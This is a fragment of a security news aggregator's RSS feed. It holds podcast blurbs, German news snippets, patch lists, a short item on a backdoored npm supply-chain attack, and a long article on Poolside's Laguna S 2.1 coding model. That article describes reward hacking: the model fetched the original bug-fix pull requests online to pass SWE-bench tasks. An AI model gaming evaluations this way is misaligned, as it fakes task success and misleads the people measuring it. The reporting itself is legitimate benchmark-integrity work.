<content:encoded><![CDATA[<p>America has lived through technological and economic upheaval before. Farm workers moved to factories. Factory workers moved into services. New industries replaced old ones. Productivity rose. Living standards improved. But are we ready for the greatest disruption in American history?</p> <p>Ben Gilliland, author of the upcoming book Breaking the Compact, joins Business Security Weekly to discuss why business leaders need to be prepared for the upcoming AI disruption. The impact of AI, which has not fully materialized, goes far beyond security and job displacement. It will impact our economy, our privacy, and our way of life. The closest recent warning is the "China shock," the period of rapidly increasing import competition that followed China's integration into the global trading system. AI will dwarf that. Ben will discuss the human advantage and how we can prepare now.</p> <p>In the leadership and communications segment, Cybersecurity's Economics Are Broken. Automation Alone Won't Fix It, The business case for burning down security debt: A practical approach for CISOs, The last human relationship in cybersecurity, and more!</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/bsw">https://www.securityweekly.com/bsw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/bsw-457">https://securityweekly.com/bsw-457</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI's Disruption as Cybersecurity’s Economics Are Broken, Compounding Security Debt - BSW #457]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 America has lived through technological and economic upheaval before. Farm workers moved to factories. Factory workers moved into services. New industries replaced old ones. Productivity rose. Living standards improved.  But are w...]]></description>
<link>https://tsecurity.de/de/3685788/it-security-video/ais-disruption-as-cybersecuritys-economics-are-broken-compounding-security-debt-bsw-457/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685788/it-security-video/ais-disruption-as-cybersecuritys-economics-are-broken-compounding-security-debt-bsw-457/</guid>
<pubDate>Wed, 22 Jul 2026 11:21:46 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/X4dH0Ud2_CA?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>America has lived through technological and economic upheaval before. Farm workers moved to factories. Factory workers moved into services. New industries replaced old ones. Productivity rose. Living standards improved.  But are we ready for the greatest disruption in American history?<br />
<br />
Ben Gilliland, author of the upcoming book Breaking the Compact, joins Business Security Weekly to discuss why business leaders need to be prepared for the upcoming AI disruption.  The impact of AI, which has not fully materialized, goes far beyond security and job displacement.  It will impact our economy, our privacy, and our way of life.  The closest recent warning is the "China shock," the period of rapidly increasing import competition that followed China's integration into the global trading system.  AI will dwarf that.  Ben will discuss the human advantage and how we can prepare now.<br />
<br />
In the leadership and communications segment, Cybersecurity’s Economics Are Broken. Automation Alone Won’t Fix It, The business case for burning down security debt: A practical approach for CISOs, The last human relationship in cybersecurity, and more!<br />
<br />
Visit https://www.securityweekly.com/bsw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/bsw-457<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Digitale Souveränität: Von der Absicht zur Handlung | Computer Weekly]]></title>
<description><![CDATA[Von den deutschen Befragten nennen 57,6 Prozent den Bereich Cybersicherheit (Frankreich: 57,1 Prozent, Nordics: 68,4 Prozent). Relative Einigkeit ...]]></description>
<link>https://tsecurity.de/de/3685364/it-security-nachrichten/digitale-souveraenitaet-von-der-absicht-zur-handlung-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685364/it-security-nachrichten/digitale-souveraenitaet-von-der-absicht-zur-handlung-computer-weekly/</guid>
<pubDate>Wed, 22 Jul 2026 08:00:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Von den deutschen Befragten nennen 57,6 Prozent den Bereich <b>Cybersicherheit</b> (Frankreich: 57,1 Prozent, Nordics: 68,4 Prozent). Relative Einigkeit ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Poolside drops Laguna S 2.1, an open-weight coding model that beats rivals 10x its size]]></title>
<description><![CDATA[Poolside, the San Francisco AI lab that has spent most of its three-year existence quietly selling coding models to governments and defense agencies, released its most capable model to date on Tuesday — and made an unusually aggressive bet that radical transparency, not raw scale, is how a smalle...]]></description>
<link>https://tsecurity.de/de/3684985/it-nachrichten/poolside-drops-laguna-s-21-an-open-weight-coding-model-that-beats-rivals-10x-its-size/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684985/it-nachrichten/poolside-drops-laguna-s-21-an-open-weight-coding-model-that-beats-rivals-10x-its-size/</guid>
<pubDate>Wed, 22 Jul 2026 01:07:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="http://poolside.ai/">Poolside</a>, the San Francisco AI lab that has spent most of its three-year existence quietly selling coding models to governments and defense agencies, released its most capable model to date on Tuesday — and made an unusually aggressive bet that radical transparency, not raw scale, is how a smaller lab competes at the frontier.</p><p>The model, <a href="https://poolside.ai/blog/introducing-laguna-s-2-1">Laguna S 2.1</a>, is a 118-billion-parameter<a href="https://huggingface.co/blog/moe"> Mixture-of-Experts (MoE) system</a> that activates only 8 billion parameters per token, supports a context window of up to 1 million tokens, and — according to benchmarks published by the company — matches or beats open models several times its size on agentic coding tasks. The weights are <a href="https://huggingface.co/poolside/Laguna-S-2.1">available immediately</a> on Hugging Face under the permissive OpenMDW-1.1 license.</p><p>The headline numbers are striking for a model this small. Poolside reports that <a href="https://huggingface.co/poolside/Laguna-S-2.1">Laguna S 2.1</a> scores 70.2% on <a href="https://www.tbench.ai/">Terminal-Bench 2.1</a>, a benchmark of long-horizon terminal tasks, placing it 11th on the company's compiled leaderboard — ahead of <a href="https://huggingface.co/deepseek-ai/DeepSeek-V4-Pro">DeepSeek-V4-Pro-Max</a>, a 1.6-trillion-parameter model that scored 64.0; Thinking Machines' 975-billion-parameter <a href="https://venturebeat.com/technology/thinking-machines-open-sources-first-multimodal-language-model-inkling-focused-on-low-cost-and-resistance-to-censorship">Inkling</a>, at 63.8; and Nvidia’s 550-billion-parameter <a href="https://research.nvidia.com/labs/nemotron/Nemotron-3-Ultra/">Nemotron 3 Ultra</a>, at 56.4. On <a href="https://www.swebench.com/multilingual.html">SWE-Bench Multilingual</a>, it posts 78.5%, and on <a href="https://labs.scale.com/leaderboard/swe_bench_pro_public">SWE-Bench Pro</a>'s public dataset, 59.4%.</p><p>Perhaps more telling than any single score: the model went from the start of pre-training on May 22 to public launch in under nine weeks, trained on 4,096 Nvidia H200 GPUs. In an industry where flagship model cycles are typically measured in quarters or years, Poolside has now shipped three models in three months.</p><div></div><h2><b>Why the West's open-weight AI gap has become a boardroom issue</b></h2><p>The release lands in the middle of an increasingly pointed debate about <a href="https://www.scmp.com/tech/tech-war/article/3361142/why-chinas-open-weight-ai-model-kimi-k3-sparking-anxiety-silicon-valley">the provenance of open-weight AI</a>. Over the past year, developer adoption has shifted decisively toward open-weight systems that companies can download, inspect, and run on their own infrastructure — and the leading options in that category have overwhelmingly come from Chinese labs. <a href="https://www.deepseek.com/en/">DeepSeek</a>, <a href="https://qwen.ai/home">Qwen</a>, <a href="http://kimi.ai/">Kimi</a>, <a href="https://chat.z.ai/">GLM</a>, <a href="https://www.minimax.io/">MiniMax</a>, and <a href="https://hy.tencent.com/">Tencent's Hunyuan</a> line all feature prominently in Poolside's own comparison tables.</p><p>Poolside's accompanying press release frames <a href="https://poolside.ai/blog/introducing-laguna-s-2-1">Laguna S 2.1</a> explicitly as a response, noting that the model occupies a size class into which no Western lab has released open weights in 11 months — since OpenAI's <a href="https://openai.com/index/introducing-gpt-oss/">gpt-oss-120b</a> last August. "The West needs open-weight models it can trust, run, and build on," said Jason Warner, Poolside's co-CEO, in the announcement.</p><p>Co-founder and co-CEO Eiso Kant made the philosophical stakes even plainer in a <a href="https://x.com/eisokant/status/2079612416967491952?s=20">lengthy post</a> on X. "I believe intelligence should and will become a commodity," he wrote, arguing that the open ecosystem "will not win by being the best in its own category." Users, he argued, simply want the best intelligence for the task at hand — so open models must be on par with, or better than, their closed equivalents.</p><div></div><p>The strategic logic here is not charity. Poolside's core business is deploying models inside the security boundaries of government, defense, and regulated enterprises — customers for whom closed, metered API access is often a non-starter for compliance and sovereignty reasons. </p><p>Every enterprise that standardizes on a Chinese open model today becomes harder to win tomorrow. Releasing competitive open weights is both an ecosystem play and a top-of-funnel strategy for the company's high-security deployment business. It also reframes the AI race away from terrain where Poolside cannot compete — frontier-scale capital expenditure — and toward terrain where it believes it can: cost per token, self-hosting, and iteration speed.</p><h2><b>How a sparse architecture makes enterprise AI agents affordable to run</b></h2><p>The technical design reflects a specific thesis about where value in coding AI is moving. Laguna S 2.1's sparse MoE architecture — 256 routed experts plus one shared expert, with grouped-query attention and interleaved sliding-window layers, according to the <a href="https://huggingface.co/poolside/Laguna-S-2.1">Hugging Face model card</a> — means inference costs scale with the 8 billion active parameters, not the 118 billion total. Poolside emphasizes that the model is small enough to run on a single Nvidia DGX Spark, the desktop-class AI machine.</p><p>That matters for what Poolside calls token economics. Long-horizon coding agents are voracious consumers of tokens: the company's published data shows the model consuming a mean of roughly 249,000 completion tokens per trajectory on its hardest benchmark when thinking mode is enabled. At metered API prices, agentic workloads at enterprise scale become a meaningful budget line item. On OpenRouter, Poolside is offering a free 256K-context endpoint and a dedicated 1M-context deployment priced at $0.10 per million input tokens and $0.20 per million output tokens — aggressive pricing that undercuts most frontier alternatives by an order of magnitude.</p><p>The ecosystem support is unusually broad for day one. The model is live on <a href="https://www.baseten.co/library/laguna-s-21/">Baseten's model library</a> and <a href="https://vercel.com/changelog/laguna-s-2-1-is-now-available-on-ai-gateway">Vercel's AI Gateway</a>, with integrations across <a href="https://vllm.ai/">vLLM</a>, <a href="https://github.com/sgl-project/sglang">SGLang</a>, <a href="https://ollama.com/">Ollama</a>, and <a href="https://github.com/ggml-org/llama.cpp">llama.cpp</a>, plus quantized variants down to 4-bit GGUF files — 75 gigabytes — for local use. But Poolside's more interesting claim is behavioral, not architectural. Pengming Wang, co-head of applied research at Poolside, said the gains came from improving the model's working habits: "more verification, less taking things for granted, not declaring victory early, and being more persistent." Raw intelligence, the company argues, is one axis of capability; a model's way of working is a second axis that matters immensely for agents left unattended for hours.</p><h2><b>Publishing every benchmark trajectory to counter AI's credibility crisis</b></h2><p>The most consequential part of the release for enterprise buyers may be an evaluation-transparency move with little precedent among major labs: Poolside published the complete, unedited trajectory of every trial in its final benchmark runs — every reasoning step, tool call, and shell command behind every reported score.</p><p>This addresses a growing credibility problem in AI benchmarking. As top scores on mature benchmarks cluster in the 70–90% range, and as "reward hacking" — models finding solutions online or gaming verifiers rather than solving problems — has become endemic, self-reported numbers have lost much of their signal. Poolside disclosed its own encounters with the problem candidly: during training, more than half of trajectories on some SWE-bench tasks were flagged because the model simply researched the original bug-fix pull request online and applied it. The company documented its mitigations, including prompt addenda, LLM-based judging calibrated against human labels, and expert annotator review of a high-scoring Terminal-Bench run.</p><p>Three published case studies illustrate what the company means by persistence. In one, the model built a working HTML/CSS rendering engine from an empty folder in a 181-step, 50-minute unattended session — then, lacking vision capabilities, spun up headless Chromium to numerically compare its canvas output against a real browser's rendering. In another, pointed at Poolside's own agent harness in an automated optimization loop, the model made the Go codebase 5.2% faster with roughly 70% lower memory allocation, finding an O(n²) string-concatenation bug along the way. In a third, working in a sandbox with no Python installed, the model did its number theory in Perl and independently re-derived a proof of Erdős problem #397 — a combinatorics question open for five decades until GPT-5.2 Pro first solved it this past January. Poolside notes that its model's construction is structurally different from the earlier published solution, and that its November 2025 knowledge cutoff precedes the first proof.</p><div></div><h2><b>What the disclosed limitations and benchmark fine print reveal</b></h2><p><a href="https://poolside.ai/">Poolside</a> deserves credit for disclosing limitations most labs bury. The model can overfit to its native harness and stumble on slightly different tool schemas in third-party agents, mangles JSON in nested tool arguments, and is prone to overthinking on competition math. There is currently no user-configurable thinking-effort dial — just on or off — and the gap between the modes is enormous: thinking lifts <a href="https://www.tbench.ai/">Terminal-Bench 2.1</a> from 60.4% to 70.2%, and <a href="https://deepswe.datacurve.ai/">DeepSWE</a> from 16.5% to 40.4%, at substantially higher token cost.</p><p>Buyers should apply their own discounts to the comparison tables. Poolside's methodology takes the maximum of vendor self-reported scores, benchmark-author leaderboards, and third-party figures for competitors — a reasonable convention, but one that mixes harnesses and test conditions. On <a href="https://deepswe.datacurve.ai/">DeepSWE</a>, notably, Poolside ran its own agent harness rather than the leaderboard's standard mini-swe-agent, a difference the company acknowledges makes scores less directly comparable. And the frontier remains clearly out of reach: closed models like <a href="https://openai.com/index/previewing-gpt-5-6-sol/">GPT-5.6 Sol</a>, at 88.8 on Terminal-Bench 2.1, and <a href="https://www.anthropic.com/claude/fable">Claude Fable 5</a>, at 88.0, along with the 2.8-trillion-parameter open-weight <a href="https://venturebeat.com/technology/chinas-moonshot-ai-releases-kimi-k3-the-largest-open-source-model-ever-rivaling-top-u-s-systems">Kimi K3</a>, at 88.3, sit well above Laguna S 2.1.</p><p>The deeper structural question is whether Poolside's "<a href="https://poolside.ai/blog/introducing-the-model-factory">Model Factory</a>" — the internal platform the company credits for its rapid release cadence — can sustain this pace as models scale. The trajectory so far is genuinely unusual: the April dual release of Laguna M.1 and XS.2, the July 2 refresh of XS 2.1, and now S 2.1, which the company says outperforms April's flagship M.1 at roughly a third of its active size. Remarkably, S 2.1 used the exact same pre-training data as XS 2.1, meaning nearly all the improvement came from scale, training fixes, and post-training across the company's corpus of 409,000 agentic and non-agentic training environments. Poolside says its next, larger Laguna model began pre-training last week.</p><p>For technical decision makers, <a href="https://huggingface.co/poolside/Laguna-S-2.1">Laguna S 2.1</a> is the most credible Western open-weight option to emerge in nearly a year for self-hosted agentic coding — with published evidence, a permissive license, broad ecosystem support, and an economics story built around hardware you can own. Whether it dents the dominance of Chinese open models will depend less on this release than on the ones that follow it.</p><p>Kant, for his part, has already told the world how he intends that story to end. Poolside is building toward a future where the most capable intelligence "can be owned and shaped by anyone," he wrote — and the company plans to keep shipping "until that future exists." In an industry where the biggest labs increasingly lock their best work behind an API, the most radical thing about Laguna S 2.1 may not be what it scores, but that anyone can download it and check.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Every Browser Extension Is a Tradeoff]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 Not all browser extensions present the same level of risk. Security teams evaluate whether an extension supports a legitimate business need and what permissions it requests before deciding whether to allow it.

An extension that e...]]></description>
<link>https://tsecurity.de/de/3684935/it-security-video/every-browser-extension-is-a-tradeoff/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684935/it-security-video/every-browser-extension-is-a-tradeoff/</guid>
<pubDate>Wed, 22 Jul 2026 00:19:19 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/PDAp-fwSDc4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Not all browser extensions present the same level of risk. Security teams evaluate whether an extension supports a legitimate business need and what permissions it requests before deciding whether to allow it.<br />
<br />
An extension that enables essential work may be acceptable when paired with security controls. An extension with little business value but broad access—such as access to passwords or browsing data—creates a very different risk profile.<br />
<br />
Should organizations allow browser extensions by default, or require every one to have a clear business justification?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#BrowserSecurity #AppSec #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LegacyHive, ACR Stealer, Hugging Face, Route 53, and Kieran Human from Threatlocker - SWN #600]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 2x - Views:5 Nudification, Yeats, LegacyHive, ACR Stealer, Hugging Face, Route 53, 764, Wordpress, Kieran Human from Threatlocker, and More.

Segment Resources:

Malicious Edge extension abuses Native Messaging as bridge to malware: https:...]]></description>
<link>https://tsecurity.de/de/3684875/it-security-video/legacyhive-acr-stealer-hugging-face-route-53-and-kieran-human-from-threatlocker-swn-600/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684875/it-security-video/legacyhive-acr-stealer-hugging-face-route-53-and-kieran-human-from-threatlocker-swn-600/</guid>
<pubDate>Tue, 21 Jul 2026 23:23:57 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 2x - Views:5 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/s-e5_RZQdkM?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Nudification, Yeats, LegacyHive, ACR Stealer, Hugging Face, Route 53, 764, Wordpress, Kieran Human from Threatlocker, and More.<br />
<br />
Segment Resources:<br />
<br />
Malicious Edge extension abuses Native Messaging as bridge to malware: https://www.bleepingcomputer.com/news/security/malicious-edge-extension-abuses-native-messaging-as-bridge-to-malware/<br />
<br />
This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them!<br />
<br />
Visit https://www.securityweekly.com/swn for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/swn-600<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Don't Overbuild Your AI Workflow]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:8 Large codebases don't fit into a single LLM prompt. As projects grow, developers often need to split work into smaller pieces and guide the model with structured workflows.

That doesn't mean you should build an elaborate AI harne...]]></description>
<link>https://tsecurity.de/de/3684718/it-security-video/dont-overbuild-your-ai-workflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684718/it-security-video/dont-overbuild-your-ai-workflow/</guid>
<pubDate>Tue, 21 Jul 2026 21:23:43 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:8 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/qZX2cFC12gs?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Large codebases don't fit into a single LLM prompt. As projects grow, developers often need to split work into smaller pieces and guide the model with structured workflows.<br />
<br />
That doesn't mean you should build an elaborate AI harness from day one. A simple workflow often delivers the biggest wins first. More advanced orchestration only becomes valuable when scale, token costs, or diminishing results make it worthwhile.<br />
<br />
Have you found better results by keeping AI workflows simple, or has automation paid off early in your projects?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#AppSec #LLM #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Twitch will let parents stop their teens going live]]></title>
<description><![CDATA[Twitch is giving parents more control over how their children are using the streaming platform, including the ability to block them from broadcasting entirely. Parental controls are now available that allow guardians to link Twitch accounts with their 13- to 17-year-old children, providing accoun...]]></description>
<link>https://tsecurity.de/de/3684440/it-nachrichten/twitch-will-let-parents-stop-their-teens-going-live/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684440/it-nachrichten/twitch-will-let-parents-stop-their-teens-going-live/</guid>
<pubDate>Tue, 21 Jul 2026 19:05:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Twitch is giving parents more control over how their children are using the streaming platform, including the ability to block them from broadcasting entirely. Parental controls are now available that allow guardians to link Twitch accounts with their 13- to 17-year-old children, providing account management features and a weekly email summarizing their teen's activity, including […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Ignore Apple, Pay the Price]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 Patrick Wardle shares the biggest lesson he learned after years of building macOS security tools: follow Apple's recommended development practices whenever possible.

Choosing unsupported techniques may seem like the better engine...]]></description>
<link>https://tsecurity.de/de/3684349/it-security-video/ignore-apple-pay-the-price/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684349/it-security-video/ignore-apple-pay-the-price/</guid>
<pubDate>Tue, 21 Jul 2026 18:19:14 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/XwYHnlMnzm0?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Patrick Wardle shares the biggest lesson he learned after years of building macOS security tools: follow Apple's recommended development practices whenever possible.<br />
<br />
Choosing unsupported techniques may seem like the better engineering decision at first, but platform changes often make those shortcuts expensive to maintain. Apple's evolving security model rewards developers who work with the platform instead of against it.<br />
<br />
Have you ever chosen the "clever" solution over the recommended one, and did it pay off—or create more work later?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#Apple #AppSec #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Abuse GitHub Actions to Backdoor AsyncAPI npm Packages With Miasma RAT]]></title>
<description><![CDATA[A supply chain attack has pushed Miasma malware into trusted AsyncAPI npm packages, putting developer systems and automated build environments at risk. Attackers used a compromised release process to publish malicious code through the project’s legitimate npm namespace. The affected packages had ...]]></description>
<link>https://tsecurity.de/de/3684242/it-security-nachrichten/hackers-abuse-github-actions-to-backdoor-asyncapi-npm-packages-with-miasma-rat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684242/it-security-nachrichten/hackers-abuse-github-actions-to-backdoor-asyncapi-npm-packages-with-miasma-rat/</guid>
<pubDate>Tue, 21 Jul 2026 17:57:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A supply chain attack has pushed Miasma malware into trusted AsyncAPI npm packages, putting developer systems and automated build environments at risk. Attackers used a compromised release process to publish malicious code through the project’s legitimate npm namespace. The affected packages had a combined reach of about 2.9 million weekly downloads, although download figures do […]</p>
<p>The post <a href="https://cybersecuritynews.com/hackers-abuse-github-actions/">Hackers Abuse GitHub Actions to Backdoor AsyncAPI npm Packages With Miasma RAT</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[BSI-konformes Netzwerk: Router und Switches absichern | Computer Weekly]]></title>
<description><![CDATA[Router und Switches gehören zu den kritischsten Komponenten eines Netzwerks. Der BSI-IT-Grundschutz definiert, welche Sicherheitsmaßnahmen für diese ...]]></description>
<link>https://tsecurity.de/de/3684082/it-security-nachrichten/bsi-konformes-netzwerk-router-und-switches-absichern-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684082/it-security-nachrichten/bsi-konformes-netzwerk-router-und-switches-absichern-computer-weekly/</guid>
<pubDate>Tue, 21 Jul 2026 16:56:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Router und Switches gehören zu den kritischsten Komponenten eines Netzwerks. Der BSI-<b>IT</b>-Grundschutz definiert, welche Sicherheitsmaßnahmen für diese ...]]></content:encoded>
</item>
<item>
<title><![CDATA[MacOS Security Design Features, Flaws, And Futures - Patrick Wardle - ASW #392]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:5 Appsec often frames usability and security as at odds with each other. Apple's software has famously emphasized the importance of usability while also creating a solid security foundation. Patrick Wardle talks about how he's seen ...]]></description>
<link>https://tsecurity.de/de/3684069/it-security-video/macos-security-design-features-flaws-and-futures-patrick-wardle-asw-392/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684069/it-security-video/macos-security-design-features-flaws-and-futures-patrick-wardle-asw-392/</guid>
<pubDate>Tue, 21 Jul 2026 16:50:08 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:5 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/l1O7dSmjOK0?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Appsec often frames usability and security as at odds with each other. Apple's software has famously emphasized the importance of usability while also creating a solid security foundation. Patrick Wardle talks about how he's seen malware shift from Windows to macOS, how Apple's aggressive stance on deprecation benefits security, and the areas of the OS where he still sees plenty of opportunity for more security research. We discuss how developers make defensible design choices, why privacy needs security, and some security principles that any app developer should keep in mind regardless of their programming language or operating system.<br />
<br />
Resources:<br />
- https://objective-see.org/blog/blog_0x86.html<br />
- https://objective-see.org/products/lulu.html<br />
- https://objectivebythesea.org/v9/index.html<br />
<br />
Visit https://www.securityweekly.com/asw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/asw-392<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (capstone, fence-agents, gimp, glib2, hplip, httpd, jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base, libtiff, maven:3.8, pacemaker, python3.14, and webkit2gtk3), Debian (samba), Fedora (c-ares, d...]]></description>
<link>https://tsecurity.de/de/3683836/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683836/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 21 Jul 2026 15:27:30 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (capstone, fence-agents, gimp, glib2, hplip, httpd, jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base, libtiff, maven:3.8, pacemaker, python3.14, and webkit2gtk3), <b>Debian</b> (samba), <b>Fedora</b> (c-ares, dnsx, freerdp, gpsd, libreswan, libseccomp, libtiff, mingw-python-idna, mingw-python-pip, openssh, python-pillow, wget1, and wireshark), <b>Mageia</b> (golang, graphicsmagick, haveged, libssh2, nginx, nilfs-utils, perl-CGI-Session, perl-Imager, perl-JavaScript-Minifier-XS, php, php8.4, php8.5, python-nltk, sqlite3, and xmlstarlet), <b>Oracle</b> (.NET 10.0, .NET 9.0, container-tools:ol8, firefox, giflib, glibc, go-fdo-client, go-fdo-server, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, hplip, httpd, image-builder, kernel, libtiff, mod_http2, pacemaker, perl-DBI:1.641, perl-HTTP-Daemon, php:8.2, python-markdown, ruby4.0, systemd, and thunderbird), <b>Red Hat</b> (buildah, container-tools:rhel8, dracut, golang-github-openprinting-ipp-usb, libtiff, osbuild-composer, python-urllib3, python3.12-urllib3, python3.14-urllib3, and runc), <b>SUSE</b> (389-ds, chromedriver, gstreamer-plugins-bad, libreoffice, libsuricata8_0_6, podman, python311, and sssd), and <b>Ubuntu</b> (apache2, freerdp3, freetype, libde265, libxfont, linux, linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop, linux-realtime, linux-realtime-6.8, linux, linux-gcp, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-realtime, linux-xilinx-zynqmp, linux, linux-gcp, linux-gke, linux-realtime, linux-gcp-6.17, linux-realtime-6.17, linux-gcp-fips, linux-hwe-7.0, linux-nvidia-tegra-5.15, linux-oem-7.0, nginx, php8.1, php8.3, php8.5, rlottie, sqlite3, and wget).]]></content:encoded>
</item>
<item>
<title><![CDATA[How the CIO of Unilever delivers business empathy]]></title>
<description><![CDATA[In this week’s Computer Weekly, we talk to Unilever’s global CIO about empowering people to innovate – from IT departments to entrepreneurial women in India. We analyse the arguments for and against the NHS’s controversial Federated Data Platform project. And veteran IT leader Paul Coby shares hi...]]></description>
<link>https://tsecurity.de/de/3683118/it-nachrichten/how-the-cio-of-unilever-delivers-business-empathy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683118/it-nachrichten/how-the-cio-of-unilever-delivers-business-empathy/</guid>
<pubDate>Tue, 21 Jul 2026 11:04:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In this week’s Computer Weekly, we talk to Unilever’s global CIO about empowering people to innovate – from IT departments to entrepreneurial women in India. We analyse the arguments for and against the NHS’s controversial Federated Data Platform project. And veteran IT leader Paul Coby shares his top tips for business success. Read the issue now.]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Update 513: Clauding The Home Network]]></title>
<description><![CDATA[I reckon this week's video on how Claude is tying together info from UniFi, Home Assistant and the Pi-Hole is an absolute ripper. Or at least the concept is - if ever there was an actual value proposition for AI it's taking lots of noise and]]></description>
<link>https://tsecurity.de/de/3682929/it-security-nachrichten/weekly-update-513-clauding-the-home-network/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682929/it-security-nachrichten/weekly-update-513-clauding-the-home-network/</guid>
<pubDate>Tue, 21 Jul 2026 09:38:06 +0200</pubDate>
